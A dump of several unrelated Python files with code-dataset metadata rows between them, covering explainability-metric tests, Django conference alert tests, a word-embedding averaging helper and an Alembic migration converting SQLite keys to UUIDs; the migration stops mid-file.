"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"exception": ValueError},
),
(
lazy_fixture("load_mnist_model_tf"),
lazy_fixture("load_mnist_images_tf"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
],
)
def test_model_parameter_randomisation(
model: ModelInterface,
data: np.ndarray,
params: dict,
expected: Union[float, dict, bool],
):
x_batch, y_batch = (
data["x_batch"],
data["y_batch"],
)
explain = params["explain_func"]
if params.get("a_batch_generate", True):
a_batch = explain(
model=model,
inputs=x_batch,
targets=y_batch,
**params,
)
else:
a_batch = None
if "exception" in expected:
with pytest.raises(expected["exception"]):
scores_layers = ModelParameterRandomisation(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
return
scores_layers = ModelParameterRandomisation(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
if isinstance(expected, float):
assert all(
s == expected for layer, scores in scores_layers.items() for s in scores
), "Test failed."
else:
assert all(
((s > expected["min"]) & (s < expected["max"]))
for layer, scores in scores_layers.items()
for s in scores
), "Test failed."
@pytest.mark.randomisation
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": False,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": False,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
"a_batch_generate": False,
},
{"min": 0.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"num_classes": 10,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": True,
},
{"min": 0.0, "max": 1.0},
),
],
)
def test_random_logit(
model: ModelInterface,
data: np.ndarray,
params: dict,
expected: Union[float, dict, bool],
):
x_batch, y_batch = (
data["x_batch"],
data["y_batch"],
)
explain = params["explain_func"]
if params.get("a_batch_generate", True):
a_batch = explain(
model=model,
inputs=x_batch,
targets=y_batch,
**params,
)
else:
a_batch = None
scores = RandomLogit(**params)(
model=model,
x_batch=x_batch,
y_batch=y_batch,
a_batch=a_batch,
**params,
)
if isinstance(expected, float):
assert all(s == expected for s in scores), "Test failed."
else:
assert all(s > expected["min"] for s in scores), "Test failed."
assert all(s < expected["max"] for s in scores), "Test failed."
| 31.292453 | 84 | 0.478243 | 886 | 9,951 | 5.063205 | 0.117381 | 0.076014 | 0.076906 | 0.071333 | 0.904146 | 0.904146 | 0.889657 | 0.882078 | 0.882078 | 0.882078 | 0 | 0.014943 | 0.401467 | 9,951 | 317 | 85 | 31.391167 | 0.738247 | 0 | 0 | 0.737013 | 0 | 0 | 0.245603 | 0.041302 | 0 | 0 | 0 | 0 | 0.016234 | 1 | 0.006494 | false | 0 | 0.029221 | 0 | 0.038961 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e1c4a6e95e70ac6e91757554a477776a8fc55abb | 3,534 | py | Python | app/conference/tests/test_listeners.py | confbot-telegram-conferences/confbot | 52fa307275b679748b5a7a6e7cb29bfc7b792875 | [
"MIT"
] | 1 | 2022-01-18T05:19:45.000Z | 2022-01-18T05:19:45.000Z | app/conference/tests/test_listeners.py | confbot-telegram-conferences/confbot | 52fa307275b679748b5a7a6e7cb29bfc7b792875 | [
"MIT"
] | null | null | null | app/conference/tests/test_listeners.py | confbot-telegram-conferences/confbot | 52fa307275b679748b5a7a6e7cb29bfc7b792875 | [
"MIT"
] | 1 | 2022-01-18T13:54:57.000Z | 2022-01-18T13:54:57.000Z | import pytest
from app.conference.models.channel import Channel
from app.conference.listener import start_conference_alert_owner, evaluated_conference_alert_owner
from app.conference.factories import ChannelFactory, ConferenceFactory, UserConferenceFactory
from app.users.tests.factories import UserFactory
@pytest.mark.django_db
def test_start_conference_alert_owner_alert_false(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
start_conference_alert_owner(conference, user)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_start_conference_alert_owner_is_the_owner(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
start_conference_alert_owner(conference, user)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_start_conference_alert_owner(user, mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(alert_to_owner=True, owner=user)
start_conference_alert_owner(conference, UserFactory())
assert send_message_mock.called
assert get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner_alert_false(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, user, user_conference)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner_is_the_owner(mocker, user):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, user, user_conference)
assert not send_message_mock.called
assert not get_bot_mock.called
@pytest.mark.django_db
def test_evaluated_conference_alert_owner(user, mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
get_bot_mock = mocker.patch("app.conference.listener.get_bot")
conference = ConferenceFactory(alert_to_owner=True, owner=user)
user_conference = UserConferenceFactory()
evaluated_conference_alert_owner(conference, UserFactory(), user_conference)
assert send_message_mock.called
assert get_bot_mock.called
@pytest.mark.django_db
def test_channel_active_no_change(mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
channel: Channel = ChannelFactory(published=False)
channel.name = "channel name"
channel.save()
assert not send_message_mock.called
@pytest.mark.django_db
def test_channel_active_change(mocker):
send_message_mock = mocker.patch("app.conference.listener.send_message")
channel = ChannelFactory()
channel.published = True
channel.save()
assert send_message_mock.called
| 40.62069 | 98 | 0.804471 | 460 | 3,534 | 5.847826 | 0.1 | 0.098141 | 0.089219 | 0.09368 | 0.852788 | 0.834572 | 0.827138 | 0.814126 | 0.814126 | 0.814126 | 0 | 0 | 0.113752 | 3,534 | 86 | 99 | 41.093023 | 0.858876 | 0 | 0 | 0.728571 | 0 | 0 | 0.137521 | 0.134126 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.114286 | false | 0 | 0.071429 | 0 | 0.185714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bec9f1923e9d0f0ff13a30227efb3262d3f46e27 | 158 | py | Python | watchlib/__init__.py | marcjulianschwarz/apple-health-analyser | f27281a328116806b0cb54c5d4a01c1eb5f667ed | [
"MIT"
] | 6 | 2021-12-16T06:51:34.000Z | 2022-02-26T15:38:17.000Z | watchlib/__init__.py | marcjulianschwarz/apple-health-analyser | f27281a328116806b0cb54c5d4a01c1eb5f667ed | [
"MIT"
] | 2 | 2022-01-18T03:16:07.000Z | 2022-01-21T09:23:16.000Z | watchlib/__init__.py | marcjulianschwarz/apple-health-analyser | f27281a328116806b0cb54c5d4a01c1eb5f667ed | [
"MIT"
] | 1 | 2022-01-18T01:30:06.000Z | 2022-01-18T01:30:06.000Z | from watchlib.animation import *
from watchlib.data_handler import *
from watchlib.plot import *
from watchlib.utils import *
from watchlib.analysis import *
| 26.333333 | 35 | 0.810127 | 21 | 158 | 6.047619 | 0.428571 | 0.472441 | 0.566929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126582 | 158 | 5 | 36 | 31.6 | 0.92029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
835e7b3b7f0239bd0776d87e19be53cb15474006 | 212 | py | Python | spdivik/inspect/callback/__init__.py | spectre-team/spectre-divik | 8e5cec5bc0040eb01cf6621bfb0753886f58524b | [
"Apache-2.0"
] | null | null | null | spdivik/inspect/callback/__init__.py | spectre-team/spectre-divik | 8e5cec5bc0040eb01cf6621bfb0753886f58524b | [
"Apache-2.0"
] | 2 | 2018-01-20T19:11:02.000Z | 2018-01-23T21:44:53.000Z | spdivik/inspect/callback/__init__.py | spectre-team/spectre-divik | 8e5cec5bc0040eb01cf6621bfb0753886f58524b | [
"Apache-2.0"
] | null | null | null | import spdivik.inspect.callback.visualization
import spdivik.inspect.callback.exclusion
import spdivik.inspect.callback.persistence
import spdivik.inspect.callback.recolor
import spdivik.inspect.callback.tabbing
| 35.333333 | 45 | 0.882075 | 25 | 212 | 7.48 | 0.36 | 0.347594 | 0.534759 | 0.748663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04717 | 212 | 5 | 46 | 42.4 | 0.925743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
835fc3bfe2eb02c933a9823266e584ca007d490e | 1,981 | py | Python | prepare_embeddings.py | AustinYunker/Twitter-Prediction | 35bfbd2d060d316bfea5f02add3570f82d3037fc | [
"MIT"
] | null | null | null | prepare_embeddings.py | AustinYunker/Twitter-Prediction | 35bfbd2d060d316bfea5f02add3570f82d3037fc | [
"MIT"
] | null | null | null | prepare_embeddings.py | AustinYunker/Twitter-Prediction | 35bfbd2d060d316bfea5f02add3570f82d3037fc | [
"MIT"
] | null | null | null | import numpy as np
def document_vectorizer(corpus, model, num_features):
"""
This averages all the word embeddings in the tweet.
This function averages all the word embeddings in the tweet.
corpus: String text corpus
Model: Model to use
num_features: Int, the number of features to use
"""
vocabulary = set(model.wv.index_to_key)
def average_word_vectors(words, model, vocabulary, num_features):
feature_vector = np.zeros((num_features,), dtype="float64")
nwords = 0.
for word in words:
if word in vocabulary:
nwords += 1
feature_vector = np.add(feature_vector, model.wv[word])
if nwords:
feature_vector = np.divide(feature_vector, nwords)
return feature_vector
features = [average_word_vectors(tokenized_sentence, model, vocabulary, num_features)
for tokenized_sentence in corpus]
return np.array(features)
def document_vectorizer_glove(corpus, model, num_features):
"""
This function averages all the word embeddings based on the glove model.
corpus: String text corpus
Model: Model to use
num_features: Int, the number of features to use
returns: numpy array
"""
vocabulary = set(model.index_to_key)
def average_word_vectors(words, model, vocabulary, num_features):
feature_vector = np.zeros((num_features,), dtype="float64")
nwords = 0.
for word in words:
if word in vocabulary:
nwords += 1
feature_vector = np.add(feature_vector, model[word])
if nwords:
feature_vector = np.divide(feature_vector, nwords)
return feature_vector
features = [average_word_vectors(tokenized_sentence, model, vocabulary, num_features)
for tokenized_sentence in corpus]
return np.array(features) | 30.953125 | 89 | 0.635033 | 237 | 1,981 | 5.135021 | 0.232068 | 0.128184 | 0.073952 | 0.085456 | 0.885785 | 0.846343 | 0.846343 | 0.803615 | 0.741167 | 0.741167 | 0 | 0.005731 | 0.295305 | 1,981 | 64 | 90 | 30.953125 | 0.866046 | 0.202928 | 0 | 0.774194 | 0 | 0 | 0.009296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.032258 | 0 | 0.290323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
55c8c69c887bc103f3cea60627f74421365edd58 | 41,120 | py | Python | migrations/sqlite_versions/2020-05-18_6c1e62ee267f_switch_to_uuids_for_pks_for_sqlite.py | debrief/pepys-import | 12d29c0e0f69e1119400334983947893e7679b6b | [
"Apache-2.0"
] | 4 | 2021-05-14T08:22:47.000Z | 2022-02-04T19:48:25.000Z | migrations/sqlite_versions/2020-05-18_6c1e62ee267f_switch_to_uuids_for_pks_for_sqlite.py | debrief/pepys-import | 12d29c0e0f69e1119400334983947893e7679b6b | [
"Apache-2.0"
] | 1,083 | 2019-11-06T17:01:07.000Z | 2022-03-25T10:26:51.000Z | migrations/sqlite_versions/2020-05-18_6c1e62ee267f_switch_to_uuids_for_pks_for_sqlite.py | debrief/pepys-import | 12d29c0e0f69e1119400334983947893e7679b6b | [
"Apache-2.0"
] | 4 | 2019-11-06T12:00:45.000Z | 2021-06-09T04:18:28.000Z | """Switch to UUIDs for PKs for SQLite
Revision ID: 6c1e62ee267f
Revises: ccc37f794db6
Create Date: 2020-05-18 16:54:47.274410
"""
import sqlalchemy as sa
from alembic import op
import pepys_import
# revision identifiers, used by Alembic.
revision = "6c1e62ee267f"
down_revision = "ccc37f794db6"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Activations", schema=None) as batch_op:
batch_op.alter_column(
"activation_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Changes", schema=None) as batch_op:
batch_op.alter_column(
"change_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ClassificationTypes", schema=None) as batch_op:
batch_op.alter_column(
"class_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("CommentTypes", schema=None) as batch_op:
batch_op.alter_column(
"comment_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Comments", schema=None) as batch_op:
batch_op.alter_column(
"comment_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"comment_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("CommodityTypes", schema=None) as batch_op:
batch_op.alter_column(
"commodity_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ConfidenceLevels", schema=None) as batch_op:
batch_op.alter_column(
"confidence_level_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("ContactTypes", schema=None) as batch_op:
batch_op.alter_column(
"contact_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Contacts", schema=None) as batch_op:
batch_op.alter_column(
"contact_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("DatafileTypes", schema=None) as batch_op:
batch_op.alter_column(
"datafile_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Datafiles", schema=None) as batch_op:
batch_op.alter_column(
"datafile_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"datafile_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Extractions", schema=None) as batch_op:
batch_op.alter_column(
"extraction_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Geometries", schema=None) as batch_op:
batch_op.alter_column(
"geo_sub_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"geo_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"geometry_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("GeometrySubTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_sub_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("GeometryTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("HostedBy", schema=None) as batch_op:
batch_op.alter_column(
"host_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"hosted_by_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Logs", schema=None) as batch_op:
batch_op.alter_column(
"change_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"log_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("LogsHoldings", schema=None) as batch_op:
batch_op.alter_column(
"commodity_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"logs_holding_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"unit_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Media", schema=None) as batch_op:
batch_op.alter_column(
"media_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"media_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"subject_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
with op.batch_alter_table("MediaTypes", schema=None) as batch_op:
batch_op.alter_column(
"media_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Nationalities", schema=None) as batch_op:
batch_op.alter_column(
"nationality_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Participants", schema=None) as batch_op:
batch_op.alter_column(
"participant_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("PlatformTypes", schema=None) as batch_op:
batch_op.alter_column(
"platform_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Platforms", schema=None) as batch_op:
batch_op.alter_column(
"nationality_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"platform_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("Privacies", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("SensorTypes", schema=None) as batch_op:
batch_op.alter_column(
"sensor_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Sensors", schema=None) as batch_op:
batch_op.alter_column(
"host",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
batch_op.alter_column(
"sensor_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
with op.batch_alter_table("States", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=True,
)
batch_op.alter_column(
"sensor_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"state_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Synonyms", schema=None) as batch_op:
batch_op.alter_column(
"entity",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"synonym_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("TaggedItems", schema=None) as batch_op:
batch_op.alter_column(
"item_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tag_id",
